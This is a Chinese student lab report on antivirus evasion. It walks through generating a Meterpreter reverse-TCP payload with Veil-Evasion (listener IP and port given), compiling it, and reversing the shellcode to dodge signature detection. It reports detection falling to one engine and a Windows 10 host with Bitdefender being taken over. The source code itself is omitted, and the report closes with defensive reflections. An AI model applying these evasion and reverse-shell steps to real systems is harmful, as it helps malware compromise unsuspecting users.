20145221高其免殺原理與實踐

啟發式惡意軟體檢測

f-prot是一款防毒軟體，有三個啟發引擎，可見其是比較強大的，但其誤報我也深感無能為力啊（後文會介紹）……

基於行為的惡意軟體檢測

改變行為

操作模式

其它方法

從上圖可以看出，許多殺軟一針見血的指出了該程式為「木馬類」程式

所以接下來要展現強大的免殺技術，順利讓我們的木馬潛入特洛伊！

在終端下輸入指令veil-evasion即可開啟軟體，根據menu的提示依次鍵入以下指令：

use python/meterpreter/rev_tcp //設定payload set lhost 192.168.18.128 //設定**連線ip set port 443 //設定**埠443，預設為4444 generate //生成 5221 //程式名

1

將上述**從虛擬機器裡copy出來，用microsoft visual studio 2013進行編譯執行生成可執行檔案

在kali下進入msf開啟監聽程序，方式參考博文

在靶機上執行nc1.0可執行檔案，kali成功獲取許可權

virscan.org檢測結果如下：

小結：可以看出，生成shellcode半手工打造，而不是通過msfvenom指令生成乙個可執行檔案，風險已經降低了不少，但是仍被定性為病毒檔案，所以需要進一步考慮修改**

輸出到文字後複製貼上到木馬源**中，為如下格式：

設定shellcode的逆序後，在木馬程式源**中對其進行再逆序即可完成，實際操作起來只需在主函式開始位置引入乙個初始化函式init()求逆序，後續和第一部分內容大同小異，不再贅述

最後給一下virscan.org檢測結果：

小結：不難發現，通過對shellcode求其逆序，改變了程式的特徵碼，一下減少了3個防毒引擎，唯一發現病毒的是f-prot，這是一款啟發式引擎的防毒軟體，但也沒有檢測出病毒型別。相比之下，修改後的已經安全了不少。

廢話不多說了，貼上新版本的**：

最後給一下virscan.org檢測結果：

靶機配置：win10，bitdefender2017最新版（截至2017/3/19）

木馬程式：nc3.0

在kali機上開啟監聽程序，然後在win10靶機上開啟木馬程式（保持病毒防護軟體一直處於工作狀態）

很幸運，bitdefender 2017並沒有在此過程中報毒，以下是隨便測試的幾條指令

免殺的實驗做的還是很有趣的，有一種在暗夜裡潛行，生怕被人發現的那種刺激感；通過這次實驗，做好免殺還是要有一定的程式設計技巧的，如果完全依賴於meterpreter、加殼工具等一些軟體服務，免殺效果是不明顯的，因為你知道這些可以做免殺可以加殼，難道人家殺軟不知道沒有分析過？所以網路上流行的這些軟體，實際上免殺效果並不好，詳見部落格

免殺最好的效果就是純手工，純人為構造，殺軟可以分析免殺軟體生成的模式進而發現其隱藏的規律，而人為構造的惡意**往往因為不具有普遍性而難以捉摸；但免殺的嘗試不是一蹴而就的，就像這次的實踐，是在不斷的修改**過程中，從開始21家報毒，到後來1家報毒，逐漸達到了免殺的級別，這個過程需要不斷的嘗試；

防毒與免殺就是矛與盾，是一種博弈關係，是一種此消彼長的競爭關係，只要網際網路還存在，防毒與免殺就是網際網路安全永恆的主題；防毒軟體的薄弱在本次實踐中可見一斑，所以以後在網路中要「潔身自好」，不該點選的鏈結別點，來歷不明的第三方軟體別下，定時更新病毒庫、查毒、防毒；

這一種博弈關係非常微妙，就像本文提到的，本來virscan.org的目的可能是幫助檢查是否為病毒檔案，但可能被「我們」這樣的人惡意利用，用來檢測自己的病毒是否免殺；又比如，加殼軟體的初衷可能是版權問題，防止他人惡意反彙編、逆向，但這又能被「我們」利用，讓「殼」變成病毒的保護殼，正所謂，工具本無好壞，人心才有善惡！

20145221高其免殺原理與實踐

20145221高其 Web基礎

20145320免殺原理與實踐

Exp3 免殺原理與實踐

20145221高其 免殺原理與實踐

20145221高其 Web基礎

20145320免殺原理與實踐

Exp3 免殺原理與實踐

相關推薦

20145221高其免殺原理與實踐